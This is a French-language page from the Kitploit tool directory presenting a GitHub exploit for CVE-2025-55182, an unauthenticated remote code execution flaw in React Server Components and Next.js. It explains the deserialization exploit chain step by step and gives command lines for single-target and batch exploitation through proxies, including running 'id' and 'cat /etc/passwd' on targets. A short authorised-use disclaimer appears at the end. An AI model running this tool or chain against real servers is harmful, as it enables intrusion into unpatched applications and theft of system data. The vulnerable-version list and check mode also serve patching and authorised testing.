Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Exploit d'exécution de code à distance sans authentification pour les composants serveur React et Next.js via une vulnérabilité de désérialisation. Prend en charge le scan de cibles uniques et le balayage par lots avec proxy et multithreading. | Kitploit
Outils/GitHubGitHub/luoluoqingge/cve-2025-55182
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubluoluoqingge/cve-2025-55182

CVE-2025-55182

Exploit d'exécution de code à distance sans authentification pour les composants serveur React et Next.js via une vulnérabilité de désérialisation. Prend en charge le scan de cibles uniques et le balayage par lots avec proxy et multithreading.

Voir le dépôt
12il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - React2Shell

Exécution de code à distance pré-authentification dans React Server Components / Next.js

PropriétéValeur
ID CVECVE-2025-55182
CVSS10.0 (Critique)
CWECWE-502 : Désérialisation de données non fiables
TypeRCE pré-authentification

Périmètre touché

ComposantVersions affectées
React19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6
Paquets associésreact-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel

Principe de la vulnérabilité

Cette vulnérabilité exploite un défaut de désérialisation dans le protocole Flight des React Server Components (RSC). En construisant une requête multipart/form-data malveillante, elle permet une exécution de code à distance non autorisée. La chaîne d'exploitation complète est la suivante :

  1. Via une requête POST multipart/form-data avec l'en-tête Next-Action, on déclenche le chemin Server Action.
  2. Le Chunk "0" contient un objet JSON soigneusement construit (non encapsulé dans un tableau). $1:__proto__:then accède à Chunk.prototype.then sur l'objet Chunk 1 en état PENDING, le rendant thenable.
  3. $1:constructor:constructor est résolu via la chaîne de prototypes en constructeur Function.
  4. Chunk.prototype.then appelle initializeModelChunk pour analyser le champ value '{"then":"$B0"}'.
  5. Le blob $B0 est analysé et appelle _formData.get(_prefix + "0"), soit Function(code + "0").
  6. L'objet fonction retourné possède sa propre propriété then, est considéré comme thenable et est invoqué, déclenchant l'exécution de code et réalisant la RCE.

Installation des dépendances

root@kitploit:~
pip install requests[socks]

Le script tentera d'installer automatiquement requests et PySocks si les dépendances manquent.

Utilisation

RCE sur une seule cible

root@kitploit:~
python CVE-2025-55182.py -u http://cible:3000 -c "id"

Exploitation par lots

root@kitploit:~
python CVE-2025-55182.py -f cibles.txt -c "cat /etc/passwd" -o resultats.txt

Vérification uniquement (sans exécution de commande)

root@kitploit:~
python CVE-2025-55182.py -u http://cible:3000 --check
python CVE-2025-55182.py -f cibles.txt --check -o hotes_vulnerables.txt

Utilisation d'un proxy

root@kitploit:~
# Proxy HTTP
python CVE-2025-55182.py -u http://cible:3000 -c "whoami" --proxy http://127.0.0.1:8080

# Proxy SOCKS5
python CVE-2025-55182.py -f cibles.txt -c "id" --proxy socks5://127.0.0.1:1080

Mode débogage

root@kitploit:~
python CVE-2025-55182.py -u http://cible:3000 -c "id" -v

Description complète des paramètres

ParamètreDescriptionValeur par défaut
-u, --urlURL d'une seule cible (mutuellement exclusif avec -f)-
-f, --fileFichier contenant la liste des URL cibles, une par ligne (mutuellement exclusif avec -u)-
-c, --commandCommande système à exécuter (non requis en mode --check)-
-o, --outputFichier de sortie des résultatsresults.txt
-t, --threadsNombre de threads simultanés10
-v, --verboseAfficher les sorties de débogageFalse
--proxyAdresse du proxy, prend en charge HTTP et SOCKS5-
--timeoutDélai d'attente de la requête (en secondes)15
--checkVérifier uniquement la vulnérabilité, sans exécuter de commande systèmeFalse
--verify-sslVérifier le certificat TLSFalse

Description des résultats

  • VULN — La cible est vulnérable, résultat de commande récupéré avec succès
  • MAYBE — Potentiellement vulnérable (par ex., délai d'attente dépassé)
  • ERR — Erreur de connexion
  • SAFE — Aucune vulnérabilité détectée

Les résultats du scan par lots sont écrits dans le fichier spécifié par -o ; seules les cibles confirmées vulnérables sont enregistrées.

Exemple de format targets.txt

root@kitploit:~
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# Les lignes de commentaire sont ignorées

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à la recherche en sécurité. L'utilisateur doit s'assurer d'avoir obtenu l'autorisation explicite du propriétaire du système cible. Toute intrusion non autorisée sur un système constitue une infraction pénale ; l'utilisateur assume l'entière responsabilité juridique.

Télécharger l’outil